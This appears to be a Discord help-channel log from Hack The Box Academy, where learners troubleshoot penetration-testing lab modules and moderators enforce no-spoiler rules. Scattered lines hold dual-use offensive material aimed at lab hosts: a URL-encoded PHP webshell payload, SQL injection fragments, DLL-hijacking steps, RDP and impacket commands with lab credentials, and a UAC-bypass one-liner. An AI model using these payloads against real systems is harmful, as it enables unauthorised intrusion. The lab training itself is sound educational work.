yes, this has been asked multiple times on discord and you also find it in the documentation e.g. in the code block section.
You can basically do anything using html and css also inline
can anyone help
docx is a proprietary format. Sysreptor only supports generating PDFs.
So if you currently work on a Sysreptor project you would have to redo your report in word
ngl im a bit dumb im gonna just use microsoft word to edit the colour and stuff then save to pdf and upload
got the flag thanks again @gray yacht
Hey guys anyone on the Attacking AI - Application and System the MCP part recently?
Hey HF were you able to finish the module?
Any help for this issue?
I was not running the project as "Console App (.NET Framework)". It is not the first one that shows up when opening Visual Studio. Use the search bar, look for .net framework console and choose the first one.
you can DM me
Done 🙂
Password Attacks
Credential Hunting in Windows
question: What password does Bob use to connect to the Switches via SSH? (Format: Case-Sensitive)
i got the password of the port 22 but for some reason its not accepting it , its "__admin*** " right?
any hints?
Ill take a look, thanks for the reply
has anyone had trouble with the pass the certificate portion for password attacks? i cant get printerbug.py to work. nothing happens after i hit enter
thaats not the right password
hint: rdp to his desktop and you should see an interesting file, poke around in it and see what you can find
Soc Analyst / Windows Event Logs & Finding Evil / Analyzing Evil With Sysmon & Event Logs
Replicating the DLL Hijacking with calc.exe doesn't work.
Steps:
- Renaming reflective_dll.x64.dll to WININET.dll
- moving calc.exe from C:\Windows\System32 along with WININET.dll to a writable directory (such as the Desktop folder)
Step 2 doesn't work since I don't have trusted access to the RDP. I can't move the calc.exe to any other folder.
Managed...
Insane module, once more, really good job HTB Team, Those Ai Red Teaming modules where really good! 10/10
Hey
What do you need help with?
?! 👀
Hey mates, can somebody help me, im doing the Advanced SQLi SA, by now I can exfiltrate the data of the two users in the database, but when i craft the reset key using python and java with the same functions, the page throws me invalid key message, if somebody can help me let me know, i can DM u or u can DM me
Bro why delete
@river furnace This server isn't support for video games. Contact the makers of the game.
anyone experiencing issues with boxes not starting?
L channel L support fr
@river furnace I don't care who said what. We can't help with this. This is not the server for that.
wtf
im witnessing a meme in the making
If somebody know something i would appreciate it
here too
did you open as admin
sure bro
I solved it but I think it's unintended
I think you should use Event Viewer but I didn't
what about copying instead of moving
doesn't work
u should run calc.exe after doing the steps and a message box should pop up
it runs calc normally
yeah dont see why admin wouldnt work
Ok Solved
you don't need admin
you gotta run "calc.exe" in user-mode cmd
what a mess fr!
hey im stuck on the 3rd question of the password cracking module, subsection windows lateral movement and pass the hash
ive succesfully ran netexec to change the DisableRestrictedAdmin to 0 (0x0), but connecting through xfreerdp3 with /pth:hash still fails
If I buy annual Silver Annual Plan, can I cancel and get remained refund at anytime?
Resolved.
Steps:
- Go to C:\Tools\Reflective DLLInjection
- Rename reflective_dll.x64.dll to WININET.dll
- Move renamed file to Desktop
- Open Administrator Powershell
- Copy calc.exe from C:\Windows\System32 to Desktop
- Open cmd (not admin cmd)
- run calc.exe from cmd
so just clicking it doesnt work?
I think it would
If I buy annual Silver Annual Plan, can I cancel and get remained refund at anytime? Should I ask the question here or anywhere else?
The moment you buy you get the sub for the whole year
cancelling it just wont make it renew next year
are you sure it changed with nxc
did you enter with winrm first
I want to buy silver first and then upgrade to gold later but I want to cost minimumly
No one here can help with that. You'll have to reach out to support on the website and ask. Support for billing stuff isn't provided over Discord.
Hey, I am currently doing the "intro to whitebox pentesting" module, on skill assessment Q2.
I have patched the code to the point that it works and AI engines do not find vulnerabilities. However the site does not accept it and returns "result: injection failed" but does not return the flag, which is weird because that's the entire point of the exercise.
Can anyone please help?
Thank you
has anyone had trouble with the pass the certificate portion for password attacks? i cant get printerbug.py to work. nothing happens after i hit enter
Since Academy content regarding Windows is on Windows 10 boxes, is it also valid for Windows 11?
Thanks, that's good to know! So no difference at all regarding the attacks and everything th
yeah i never encountered anything
anyone toss me a hint or some help?
Nice! I was worried the knowledge I've gained will be useless, haha. Do you know if the Windows machines will be migrated to Win 11 OS soon?
Haven't heard anything about that
most of it will work on older versions of windows too, windows doesn't really change that much from version to version
all the basics are still there, like groups, permissions, acl's, etc
they don't actually rebuild the whole OS from scratch every time
Yes but I thought surely they must have killed all the attacks that were possible previously... I guess not then, which is good since I won't have to re-learn everything
nah, you usually attack windows misconfigurations rather than vulnerabilities
hello
im stuck in the wordpress skill assessment if anyone could help
Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.
if i found the plugin how can i find the file for that ?
Module: Shells & Payloads > (page 5) Reverse Shells
I am connected to the academy VPN. I started the instance. When I try to ping it, no route to host. I'm not sure what's going on.
I've never had this issue before.
I just did a previous module which required me to be on Academy VPN
I switched VPN to US Academy 1. Download the vpn file. Connect to it. I do ip a and I get tun0 up with a 10.x IP.
I try to ping the machine instance and Destination host unreachable.
I think the Skill Assessment of Attacking AI System is broken.
Not every machine responds to a ping
Well I can't even connect to it via rdp
try it with the pwnbox
ok. thanks
thanks! I just had to spend alot more time on vsc, i think i wasn't building it as a solution
I'm also running a vm now and testing connections back to my linux machine for practice
I'm in the introduction to information security module for mobile security and it says how many layers are in device security. I put the answer as <4> according to the format suggested for the answer but it says it's incorrect
What about just 4
anyone got any recommendations on what modules to move onto? literally just finished the basic starter tutorial, im going for just learning it to have as a skill currently
see the Information Security Foundations skill path
what does that teach?
The import is not working. Tried through evilwin and meterpreter
@autumn garnet did u end up getting the shellcode loader to work? i never got it working but the revshell later worked. i just started using msfvenom launching notepad shellcode but that still fails
Is anyone else currently experiencing issues with the web shell in AD Enumeration & Attacks - Skills Assessment Part I? 🤔
hi, I am new to htb.
I have an issue where I can connect to htb openvpn but to get into the website first I have to connect some vpn first because of my location. so double vpn, I can spwn the machines with openvpn connected but ping and other remote stuff doesn't work.
I am dying to learn htb but because of that issue, I can't even pass starting point meow, because telnet keeps disconnecting.
is there any vpn solution for this ? thanks
Take a look at the PwnBox
Hi everyone, I'm new here and just started htb and wanted to know for the "craking into htb" path. Could i ask some advices and also i have some questions like for free users when you accidentally close the VM workstation do u have to wait 24h and one last thing is there any offer and discount for students?
There's a student subscription that is heavily discounted
anyone i can dm for cl.te ?
Yes you need to wait 24 hr to reset ! Student discount are worth it’s only 8 dollar I am currently using it. To learn CPTS highly recommend +(unlimited VM on module )
And how can I subscribe as a student
hello everyone
i'm stuck on this question, i've found creds for the user in previous question, but I don't know where to use them (that's all I can say here)
can someone help plz,thank you
Try to add email (student email)
On your account then 💥
Thanks for the help
common remote access solution
- figure what that could mean
could be rdp, winrm, etc.
seems like the old rdp problems stills there
it also helps to know what module and section you're working on @crude grove
pivoting
it's better to mention the name of module + section , what did you try
pivoting it's tooo vague
common remote access
maybe rdp to an internal machine
because the question mentions (For your next hop)
:)
Pivoting, Tunneling, and Port Forwarding ,Skills Assessment , 6th question
I tried every service the connection drops
i mean use rdp from inside your existing/previous xfreerdp session
that's the simple answer ¯_(ツ)_/¯
i will feel so stupid if this will work 🙂 ,thank you, i'll try it
Hey @everyone
I’m currently diving into Mobile Pentesting and learning more about bypassing Dynamic SSL Pinning on Android apps.
I’ve tried some approaches using Frida and Objection, but I’d love to hear from the community:
🔹 What are your go-to tools or techniques for effectively bypassing SSL Pinning in real-world scenarios?
🔹 Any recommended writeups, scripts, or labs I should check out?
Thanks in advance for any advice or pointers 🙏
The Academy offers various modules that deal with mobile pentesting.
Thanks for the reply
I’ve already gone through the Academy modules on mobile pentesting and learned a lot from them.
Now I’d like to take my skills to a more advanced level, especially around bypassing dynamic SSL pinning and building stronger defenses.
Do you have any recommendations for advanced resources, labs, or tools that go beyond the Academy content?
hey guys
Password Attacks
Pass the Ticket (PtT) from Linux
Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \\DC01\julio.
i got till here but smbclient is not responding. need help in this please.!
You guys need to rework that Windows Event Logs module, this shit is ass. No proper info, no pre-built environment that is ready for the steps, needs lots of steps to reproduces whatever is needed to solve the questions, not enough guidance through steps to reproduce. Like wth is that module for
Sounds like you learned a lot actually. If you feel there are errors you can post in #1234357888114364508 or you can use /feedback to provide feedback to staff.
Sure thank you
Hello, can somebody help me with the Advanced SQLi SA, in the question two, i can bypass the filter with the ' encoded ||%27|| and i can run some payloads like ||34%27%20AND%201%3D1%20%2D%2D|| but when i want to run the RCE payload like SELECTS and this stuff i dont achieve the execution, i will appreciate a hint or something, actually i already tried ||; SELECT||
Hi everybody, what can i do when a target is stuck in "spawning" stage except waiting?
@cyan lily You can report it to WhatsApp. This also has nothing to do with HTB or modules, please stay on topic.
Oh sry
Anyone.?
@plain summit Please take care not to post content from modules above tier 0
Oh I can't do the ||censor||?
Spoiler tags do nothing
Hello, if somebody have the time and can help me with my script, I achieve to create the large_object but i dont know how to create the function, DM me if u want to help me with my payload or just give me a hint thanks a lot
Best to say which module/section/question you're on.
sorry ur right im in Advanced SQLi SA question 2
I need help with AD Enumeration & Attacks question 2, my meterpreter exploit is not working
@jade frigate Please take care not to post content from modules above tier 0
I'm sorry for that, I forgot about it
Hey
Hey everyone I wanted to ask about the last challenge of ai red teaming ctf going live. Can anyone help me with that
We can't help with active CTFs
xfreerdp /v:10.129.43.43 /u:sql_dev /p:'Str0ng_P@ssw0rd!' /cert-ignore -sec-nla +sec-tls +sec-rdp when I run this command in windows privilege escalation module then I get this "to signin remotely you need to right through sign in remote desktop services by default member of remote desktop user have this right, if your group don't have this right or the right have been removed from the remote desktop user group then you have to grant this right manually" , but how can I grant the right manually without the access or privilege of that devices, anyone please help how to fix this issue
You find a way to add yourself to the group or login with a user who is already in the group
thank you sir, but without accessing the machine how can we add myself to that group , or how can I know that which user are in remote desktop user group ??
Which section are you working on?
SeImpersonate and SeAssignPrimaryToken
Focus on the name of the user and what services he can access
It was showcased in the section as a hint
thank you sir, now it working
Modules > Intro to C2 Operations with Sliver.
I install
[] Client v1.5.43 - e116a5ec3d26e8582348a29cfd251f915ce4a405 - windows/amd64
Compiled at 2025-02-20 04:58:51 +0900 KST
Compiled with go version go1.20.7 linux/amd64
[] Server v1.5.43 - e116a5ec3d26e8582348a29cfd251f915ce4a405 - windows/amd64
Compiled at 2025-02-20 04:58:51 +0900 KST in windows 11.
When I execute 'armory install all' command, i can't install all files.
Is there any solutions to solve the problem?
strange, i never got this problem in sliver, the problems are others
in this module
I remove all sliver and reinstall it but same problem in windows 11. Did you run sliver in kali or ubuntu?
I did the room using pwnbox
I see. When I run sliver in kali, it execute command well but in windows I can't install the armory extensions and exe files. It could be windows problem. Thx. I have to find the way to install sliver in windows.
/bin/dash is symlink to /bin/bash or dash is symlink to /bin/bash
in the pivoting modules, the victim box interface is always xx.xx.xx.xx/16
why do i route /24 instead of /16 when i use ligolo?
If you know what you're doing you don't have to, but if you route a /24 with /16 you'll have problems that'll be hard to spot so it's good practice to route with the smallest mask you can.
Guys does module pwnbox has "'save progress" feature or such thing? im tired redoing all the stuff i already done when i decide to take break...
the pwnbox has minimal saved storage so nope, I recommend using your own VM
hmm... what about the pwnbox on cpts exam? im planning to take it on next year and im afraid my desktop performance is not even close to smooth so probably my best bet is on pwnbox...
I don't know I didn't use it but I'm pretty sure it'll be the same pwnbox,so again: minimal save storage
Uhm sorry but how am I going to fix this? (I've tried changing my VPN but it keeps saying that I don't have any instances left).
you can dm me
Are you gonna elaborate or just gonna wait for a fortune teller or a psychic?
try ctrl + shift + f5
i did find out What version of the SMB server is running on the target system and did submit the answer but it was not correct
Which module and section?
Read through that section's Footprinting/Nmap header again the answer is actually already in the example output.
I did say in #cpts to include the module and section......
could i get a little nudge for HTTP Attacks - HTTP Response Splitting? managed to get it to work with ||?target|| but not sure what the error is
"This is different for rejected packets that are returned with an RST flag. These packets contain different types of ICMP error codes or contain nothing at all." I think this is incorrect, right? When a firewall rejects a packet it sends back an ICMP message, RST packet is sent back by an open/closed port using the TCP-ACK scan
It's an either/or scenario, it's either a TCP packet with an RST flag, or an ICMP packet depending on the firewall configuration (it can also send nothing at all)
you can DM me
Just on web attacks - mass idor enumeration section. The Lab is taking well over 15 minutes for it to load and now coming up to 5 minutes to load the main page, clicking on documents within took another 5 minutes more or less. Is there something that would be slowing this down? trying new vpn now but idk if its that.
The Web Proxies module is a bit outdated when we get to the step-by-step of configuring ZAP and Foxy Proxy, some of the print screens and steps don't exist anymore
Thanks
Hey everyone this is my first time here . I’m starting my career in i.t soon and I’m graduating with a degree in i.t but my end goal is cybersecurity. I’ve been debating on either going back and getting my bachelors degree in cybersecurity or just go the certification route. Does anyone have any advice on what I should do?
#careers-and-certs if you don't have access read #rules and follow #welcome
Looking for some help on Attacking Domain Trusts - Child -> Parent from Linux
I have the ccache ticket, ligolo set up, tunnel is started
psexec and raiseChild just fail with [-] [Errno Connection error (LOGISTICS.INLANEFREIGHT.LOCAL:88)] [Errno 111] Connection refused
If anyone can nudge me as to why it's failing that would be great! Please @ with replies
can someone help with the Burp intruder fuzzing, the challenge is to fuzz for '.html' files under the /admin directory but I have been fuzzing for 30 minutes with nothing (USING WEB PROXIES module)
I'm working on Stack-Based Buffer Overflows on Linux x86 - Skills Assessment - Buffer Overflow. I've gotten to the point where I can launch a reverse shell and run commands. I've also tried to use the linux/x86/exec and linux/x86/read_file shellcodes. However, no matter what I use I don't have permissions to access the flag.txt file under /root. Can someone give me a hint as to what to try next?
Hey everyone has someone finished Android Fundamentals, if yes, can you send me the answer?
No one here will send you any answers. That's not how you get help here.
You can ask questions here, such as:
I am in module XXX, section YYY, and am stuck on question ZZZ. Can anyone help me?
If someone has worked through the module, they can probably give you tips on how to find the solution.
problem solved, used ffuf instead
I am in module Funnel and I am trying to set up my local port forwarding. I believe that the start of the command is ssh -L <LOCALPORT>:<REMOTE_HOST>:<REMOTE_PORT> USERNAME@SSH_SERVER ... But am I supposed to do that on my attack box or the target?
Attack box
Thank you!
Has anyone answered this question:
Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? (Format: build_number, Example: build_number-test)
I tried using Android Studio, that the answer is wrong
Would recommend using Ligolo, much easier, works better
Maybe someone can help with the PHP Wrappers module, I enter the command as indicated in the example, but I do not display what it should, I don’t understand why other symbols sharply appear there.
this is the example:
Can you show the other half of the URL
Try URL encoding the payload
Example: http://<SERVER_IP>:<PORT>/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
My: http://94.237.57.115:35592/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==
As I said
In the example +Cg== is replaced by %2BCg%3D%3D, I do not understand why.
URL encoding
How can I encode like this
Use Burp or Cyberchef
don't encode all the characters
Can anyone one help me on this
Anyone help me
that ticket looks expired
Yeah it was yesterdays i tried it with new ticket to but the smbclient is not responding
I encode only +Cg== and got it again
Ok, I did it, thanks, but why do i need encode only +Cg== second time?
anyone can help me?
+ is interpreted as a space
hello, little bit of topic but can someone help me with a ctf http head attack?
There is no support for active CTFs. Contact the CTF operator for further assistance.
Anyone for this? Was able to solve using the parrot machine that spawns, but I have no idea why it won't work from my own host?
Module: Shells & Payloads
Section: Live Engagement
What distribution of Linux is running on Host-2? (Format: distro name, all lower case)
I have got the metasploit module for this blog version. I setup the options, type exploit, and it fails:
Any advice?
It says no CSRF token found, can't continue
There is no csrf token in the html source. The exploit doesn't seem to work.
Oh you have to set the vhost parameter too. Doh. I got it now
hi guys how are you ?
i try web requests > CRUD API
and i cant solve this ctf
First, try to update any city's name to be 'flag'. Then, delete any city. Once done, search for a city named 'flag' to get the flag.
i did this, but don't see flag
curl -s 94.237.61.242:36315/api.php/city/flag
[{"city_name":"flag","country_name":"HTB"}]
Please specify the module and the section you're working on
Is there a problem with the modules?
I completed this module 100%, but it won't give me the achievement. I went back and looked at every page of the module, every question is done/filled in, completed.
Strange it definitely is implying you've missed a section
I've done the entire module
its laudanum one webshell to rule them all @tranquil crystal
its not showing as complete....
funny enough I did same thing and it was a missing question xD
Doh.
on that section... DUH!
web request CRUD API
Gain the knowledge and skills to identify and use shells & payloads to establish a foothold on vulnerable Windows & Linux systems. This module utilizes a fictitious scenario where the learner will place themselves in the perspective of a sysadmin trying out for a position on CAT5 Security's network penetration testing team.
hello guys, if I get the silver subscription, if I don't spend the 200 cubes, will I have 400 cubes next month?
Is it accumulative ?
user does not exist
any of the labs that are not on the 10.x.x.x range seem to be very very very slow -_- becoming painful
is it best to report to /support for that?
@icy plume don't share info for modules above tier 0
nvm its my proxy being annoying... all this time :d
can I get a prod / nudge on Skills Assessment Web Attacks please.
Super odd question:
Currently working through Attacking Domain Trusts - Cross Forest from Linux
Within their example in the module they use wley for their user but have us sign in for the lab as htb-student. Are we supposed to be taking notes of past "pwned" user creds for these labs? Please @ with replies
I believe in that module theres sections that reference creds that in later they say connect to X, without specifying them again and its vaguely implied you will need the previous sections creds.
Not much of an answer for you but that module and couple others did similar
Nah that makes sense, just a bunch of annoyances to be honest, but thanks
```
└─$ impacket-GetUserSPNs -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
[-] [Errno Connection error (FREIGHTLOGISTICS.LOCAL:389)] [Errno -2] Name or service not known
```
any idea why this error occurs? working through attacking domain trusts - cross forest from linux
i've always been wondering how actors behind very sophisticated (potentially state sponsored) cyber attacks stay anonymous, many here probably remember the not-so-recent-but-recent xz backdoor so i'll use that as an example; one of the actor(s) behind it has a regular github profile with a public email address. how can no one (including microsoft the host of the github platform, the authorities controlling the internet providers, and other hackers with means to gather information illegally) trace them? surely such intrusions attract a global manhunt for them, especially from other cyber security experts. yet they don't even know the country the supposed bad actors are from, let alone any other form of identity.
Hi Guys, I need help understanding this part in Password Attacks as it is not making sense to me.
In "Pass the Ticket (PtT) from Linux", at the segment of "Using Linux attack tools from Kerberos" where we use chisel on attack host and rdp into MS01 and use chisel there as well.
What does it mean by transfer?
Finally, we need to transfer Julio's ccache file from LINUX01 and create the environment variable KRB5CCNAME with the value corresponding to the path of the ccache file.
Not the place for this, this is for HTB modules, not general conversation topics
It's been a while since I've done this, but you want to take the ccache file and transfer the file to your attack host --> then set the variable
Did you edit /etc/hosts?
so if I am understanding it correctly, we take the ccache file from MS01 and transfer it over to the attack host?
If I remember correctly yes
ty, typo in hosts file
hmmm feels kinda weird though coz the whole flow seems weird to me as it is:
attack host (no connection to KDC/DC) -> modify host and proxychains file -> use chisel -> xfreerdp into MS01 & execute chisel -> transfer ccache file from LINUX01
anyone able to help on this? keen but blocked 😄
how do i go from MS01 to LINUX01? i cant connect the dots on it
Gotta use a pivot, I suggest Ligolo
hi for question 2 of Kerberoasting from Linux section of AD Enumeration and Attacks module, I found a list of groups, but I am having trouble narrowing down just groups the user I specify is part of. I tried using the flag to specify the user but its not working.
it's giving me all local groups I think and not just ones for that user
can someone help me out here?
Not the channel for this.
@digital pendant do you have any channel for that
can you give a little more info? What groups do you have? What do you want to narrow down to?
<@&861185840277487616> Not the discord for this
Guys take this elsewhere... clearly not the right discord for this
Okay, so, think of your powerful groups - Ent. Admins, Domain Admins, SQL Admins etc --> use grep on the output / findstr on windows
Take it to dms
Can't share content from above tier 0 guys
got the flag thanks
I think I had to guess but I got it
thanks guys
You're welcome
Sorry if responding to that was a rule break, my bad!
Does anyone have a way to make the whole forest and cross-forests thing more understandable? I'm very lost and confused when it comes to this
Hey there... I have just setup a live usb to run pwnbox locally, I am using their vpn(it runs correctly) but when I tried to ssh into a target system it said no route to host
all good now! I wasn't looking for the thing I thought I was 😄
try it with enum4linux
Thanks, this is for pre-auth. I had cloudflare-warp on in my system and for some reason that was causing connectivity issues. 
i dont have an account on your website, i just wanted to discuss general cyber security
There's no way around it, if you wanted to talk about general stuff you'd have to get a HTB account and link it here.
i'd like not to, is there some other community i can discuss cyber security?
I'd imagine there are a lot.
hey, can i ask questions here if I get stuck on something in a tier 3/4 module? and how can I get more cubes, 1000 at least?
Yes, this is the channel for module questions. Just take care not to spoil content from modules above tier 0. You can purchase cubes, which is the fastest way, get on a subscription that gives you cubes every month, and I think if you get a top placement in the season challenges you can get cubes that way.
ic! ty for answering! i'll take gold sub ig, ty!
Learn about the different Academy subscriptions.
This has more info for you
Ty super!
<@&861185840277487616>
Don't spoil modules
how to verify ?
you might need to link your account to htb, i don't see any roles on you
how to link, can't find
I don't think saying swears is allowed here no?
come in dm
there
Theres instructions in #welcome
Module: Using the Metasploit Framework
Page 10: Sessions
I am stuck on the last task. The target system has an old version of Sudo running. Find the relevant exploit and get root access to the target system. Find the flag.txt file and submit the contents of it as the answer. I found two CVE for the vuln. sudo version and neither are working.
Could someone kindly provide a hint? Thanks
try to use the command search sudo 1.8.31 and use the exploit that pops up
btw how to send messages in general?
sigh
oh in metasploit?
yep
I didn't even think to do that...
haha
i havent even done the module lol
I was busy looking up CVEs and trying to exploit
just looked up a writeup on medium
oh man, I don't wanna look at write ups but thanks
yeah fair
a hint is a hint
we need a tool where we can get hints for boxes instead of writeups fr
guys and where account identifier can be found?
Did you read #welcome
Yes, read welcome and tried to find the account identifier, which should be 60 characters long
didn't find anything that long in my profile
You can find it here:
https://app.hackthebox.com/profile/settings
Does anyone know if there's something wrong with Command Injections > Identifying Filters > "Try all other injection operators to see if any of them is not blacklisted. Which of (new-line, &, |) is not blacklisted by the web application?"
https://academy.hackthebox.com/module/109/section/1035
I found the answer but none of the options are accepted as the correct answer (encoded or not)
I ended up being able to 'brute-force' the answer. Then took the answer to see if it worked and the answer that is 'correct' does not work.
I tried it now and it worked, did you read:
https://academy.hackthebox.com/module/109/section/1032
Yep
I think I found the problem. Midway through the lab CTRL+U stopped working to URL encode so I started using CyberChef to encode.
From the section 1032, I see two different results when encoding
Try pressing the ENTER button on your keyboard and then click on BAKE! 😄
this encoding is incorrect
it's treating your input as two separate characters
%5C is the encoding for the \ character; however /n or \n is its own specific character (%0a)
Has anyone else had issues with the last question on GPO attacks of DACL II?
Seems to not want to apply any policy updates even when using gpupdate /force.
CTRL+U in Burp should URL encode though right?
it may but again it can read characters weirdly, for you to properly url encode it you'd need to encode the newline (pressing enter) not the \n because it'll likely read it as the separate characters "\" and "n"
I did this, then I get the encoded value of %5Cn%0A 😵💫
I'm so confused! Would it be ok to PM you so I don't clutter the chat?
Yeah no problem
Hey did you manage to do it? Every POST request I do I get redirected to localhost:8080 and get an error, is that really supposed to happen or is something wrong with the instance?
@spark fox No one here can help you with that. Reach out to the company that provided the account.
That doesn't solve the issue, it's a network/connectivity issue
Hey there... I have just setup a live usb to run pwnbox locally, I am using their vpn(it runs correctly) but when I tried to ssh into a target system it said no route to host {posting again cuz its not resolved yet...}
what ip does your tun0 give, do you have any more tun adapters running, and what is your ssh command. on parrot it may be ens instead of tun.
you can DM me.
Hey everyone. Has anyone gone through the AI red-team module? I am stuck on two questions as it asks to manipulate the training data as well as the input data on a model and submit your answer.... Kinda confusing because I know how to manipulate both but I have no idea what it is asking to put into the box to submit my answer.. Any help would be appreciated!
Hi I am stuck on Password Attacks module section "Attacking Windows Credential Manager" I got the password to the admin user but I am unable to change my user to "mcharles" as it asks for his password and when I try move to "mcharles" from "sadams" I am "charles" but cannot use mimikatz because of no admin privs for that user
Have you tried any of the other methods they showed in the section? 😉
I am using the pwn box locally, I ran ip -a and tun0 is there, and my ip matches the website too
But when I ping the target system it said host is unreachable
And when I ran nmap with -Pn it said host is up, but all top 1000 ports ignored
Do you mean the other tools mentioned ??
Sounds like you're misunderstanding something. The tun0 IP is your local IP address on the Pwnbox. It shouldn't match the target you're connecting to. It gives you access to the same subnet in which the target lives.
Yes. You only mentioned 1 out of like the 5 they show
okay I will try and get back to you thank you
Yes, it's not matching the target ip, it's matching the ip they show in the lab access section in app.htb/home page
Like it says I am connected to the vpn correctly, but looks like something is blocking me from connecting to the target , idk what it is
app.hackthebox.com isn't academy.hackthebox.com :) they are separate platforms
If you're using a hostname like app.htb make sure it's in your hosts file
the example IPs won't generally match the target IPs
Yes, but what I'm trying to say is... Check dms
my dms aren't open
with?
it helps others help you if you say the module and section you're working on
I got the answer but I have a question why mimikatz didn't work and the other tool worked, is it because of the privileges required to operate different tools or something that I do not understand
You're on the wrong VPN. Marcie was right.
yeah called it, you're connecting to the app.hackthebox.com vpn which is SEPARATE from the academy.hackthebox.com vpn
Labs and Academy use different VPNs, download the VPN from Academy if you want to do modules.
I just wanted to know that can we use chat GPT during our CPTS exam
Yeah I think it's due to privs, but I could be wrong
no tools are off limits
Sorry, my bad.. Junior Cyber security analyst path, linux fundamentals module, navigation section
yes it's priv issue
yeah found the root cause of the issue; it's between the keyboard and chair
so we can?
yes
But what about the hint that was given in section "Attacking Windows Credential Manager" and module "Password Attacks" about UAC bypass ??
you can do a UAC bypass to get Mimi to work
Great, thank you!
hi guys did anyone earn money here doing this?
i'm sure if you drop the binaries on your local system and use something like ghidra to examine it you can dive deeper into the lower level differences
doing what? bug bounty? i'm sure there's people. But that's not really related to the chat
i suggest reading and following the instructions in #welcome to access #careers-and-certs or #general
ok thanks
Thanks a lot... I am dumb af
Thank you so much I understood do I need to jump to privesc module to learn and implement UAC bypass if I wanted to perform UAC bypass or I have to use this types of payload I found on cheatsheet if the UAC level is between 1 to 4 msiexec /quiet /qn /i sample2.msi
nope you can find the relevant articles for a simple bypass via google
there's multiple ways to bypass
the cheatsheets only show one way, not the only way
Thank you so much I understood
could someone please help me with the "pentest in a nutshell" module I have no clue what I'm doing and have read the whole thing and cant find anything helpful
Hi, I have a question in mind like if "DPAPI" is used to encrypt the chrome passwords or any passwords and using the database keys, tools such as DONPAPI and more are able to decrypt the password but how are we able to get the msterdb key if we are not a privileged user ??
You click "Start" to go into the module and start reading the sections and then completing the challenges.
This might help you, it goes over some basic stuff like connecting to the VPN, terms, etc. https://academy.hackthebox.com/module/details/77
I have not covered the "Password Attacks" module completely but I think password attacks are especially useful when we have hashes to crack and when we trying to attack a live service for example ftp or smb or any this all depends on the wordlist, so when do I know now I should attack with passwords ?? Generally the way forward is to find misconfiguration or exploit related to the service
Well if you find creds or hashes it's obvious they go to something.
can i ask for help using bloodhound? im doing ANE and with last compromised user im not having same result on bloodhound as htb pictures
Hey guys, I need help:
Module: Password Attacks
Section: Pass the Certificate
Objective:What are the contents of flag.txt on Administrator's desktop?
Problem: I was able to login to jpinkman using the shadow credentials method and get the flag, I just don't know where to go from there to login as the Administrator, I tried to use mimikatz to find a ticket as jpinkman but I didn't have access to LSASS, and honestly i'm just kind of stuck right now. I haven't utilized the certificate authority address that's given, but I don't know what exactly I would do with it since I assume that the stuff the section covers on that wouldn't apply since you have to wait for connections. Would appreciate a push in the right direction.
Any advice?
I think my module is bugged or something, i get the answer but i get an error. The module is Windows fundamentals and the section is skill assessment
It took it finally
There is another technique besides shadow credentials covered in the section you're on
f
I understand that, but the other technique originates from the connection forcing to get a certificate then a TGT using the certificate authority, in the example they use DC01. I see that a dsync attack was used but when I tried to use the jpinkman TGT for that it didn't work. I'm guessing i do need to utilize the certificate authority address since it was given along with the domain controller address, but I'm just not sure how, any advice on that part specifically?
Yeah you need to coerce the DC to talk to the certificate server. If you need a more specific nudge it's probably best to take it over a DM to avoid spoilers
ima start doing 1-2 boxes a week for practice. what are the most common web attacks I should brush up on?
guys is it normal that the clipboard does not work when copying from the xfreerdp window ?
not usually
If you're using xfreerdp inside a VM, and want to copy via clipboard to outside the vm, you'll need to copy to somewhere inside the VM first
can anyone help me with Footprinting, i found What version of the SMB server is running on the target system but its incorrect
Hey anyone?
Which section?
SMB
Is anyone learning python?
Have you done a port scan?
Yeah
Hey?
Bro, I already answered you when you asked last time: #modules message
?
Read through that section's Footprinting/Nmap header again the answer is actually already in the example output.
https://owasp.org/www-project-top-ten/ you can't really go wrong with this...
probably best asked elsewhere though
I am also having issues with this. Especially for question 2. DM me for help with Q1, but I’m getting absolutely nothing with printerbug. Also… can’t ping CA01, but I can ping DC01. I’m not 100% sure that’s supposed to be happening.
Can't hurt to restart the lab if you think that, that often confirms or removes that from unknowns
Yeah. I did that a few times, and reset VPN. Consistently unable to ping CA01 (whether normal or not), and when I hit go on the printerbug.py.... nothing happens. Will continue to press, but like @median kettle having some roadblocks.
You can DM me if you want, not promising I have the answer but managed to get past that point so I must've done something right xD
Much appreciated!
hello, everyone. I need help about module Active Directory Enumeration & Attacks at section AD Enumeration & Attacks - Skills Assessment Part I, this question: Find cleartext credentials for another domain user. Submit the username as your answer. I used Rubeus in MS01 to find username but don't see cleartext. Please help
ok I get it with lsa.This is what I wrote after I made it. I don’t want anyone to be stuck here. I hope it can help you.
Hello everyone! Anyone did the Linux PrivEsc Skill Assessment without using the SSH creds provided? If so can i get a nudge on that? I've already finished it with the ssh creds 🙂
hi everyone , im stuck with DNS Zone Transfers attack.
i cant understand how to reach inlanefreight.htb
no way .. what i need to put in /etc/hosts to reach it ?
Thx
which ip? i tried with the ip spawned (ACADEMY-INFOGATH-WEB-DNS) but it doesn't work, i can't reach the site
The spawned target IP and the domain like:
127.0.0.1 google.com
guys can anyone help me with Footprinting im not able to locate full system path of that specific share? SMB shares
Can someone help me in the Footprinting DNS " What is the FQDN of the host where the last octet ends with "x.x.x.203"? I don't find it
Which section?
ok now it works! THX 
can anyone help me ?
Think about brute forcing
Remember that Linux-based operating systems do not have a "C:" drive. this is the hint that i have
Yes I already did it and I tried a few lists
Did you solve the question before the last?
Reuse the same command and you will find the answer of the last question
|| I did this dnsenum --dnsserver 10.129.92.82 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/seclists/Discovery/DNS/subdomains-top1million-110000.txt inlanefreight.htb ||
ill try it again if u instinct
You have some subdomains other than inlanefreight.htb, try replacing inlanefreight.htb with those subdomains
I thought I had the method but actually its not all way to root, only to one of the users within so probs not the actual shell they mean
still incorrect
The page has a table with rpcclient requests, read it 😄
||There are 3sub but none of these works ||
thank you
why cant i send a screenshot
and?
Read the verification